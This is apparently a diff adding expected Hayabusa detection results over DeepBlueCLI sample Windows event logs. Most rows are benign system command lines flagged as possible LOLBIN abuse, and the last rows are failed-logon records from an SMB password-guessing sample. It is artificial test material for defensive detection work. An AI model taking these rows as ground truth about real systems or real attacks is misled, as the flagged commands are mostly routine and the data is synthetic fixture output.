+2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
